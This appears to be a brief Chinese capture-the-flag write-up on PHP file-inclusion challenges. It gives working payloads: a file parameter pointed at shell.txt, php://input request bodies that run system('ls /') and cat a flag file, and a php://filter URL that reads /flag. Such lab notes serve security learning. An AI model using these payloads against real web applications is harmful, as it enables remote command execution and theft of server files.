?file=shell.txt
shell中要传的参数为ctfhub=system("ls");
查找flag
php://input
用bp爆破
在协议头输入: ?/file=php://input
在请求体输入:<?PHP system("ls /"); ?>
在请求体输入:<?PHP system("cat /flag_31474"); ?>
就找到了flag
远程包含
读取源代码
用之前的php://input去bp抓包发现没用
那用php://filter去对文件进行访问
?file=php://filter/resource=/flag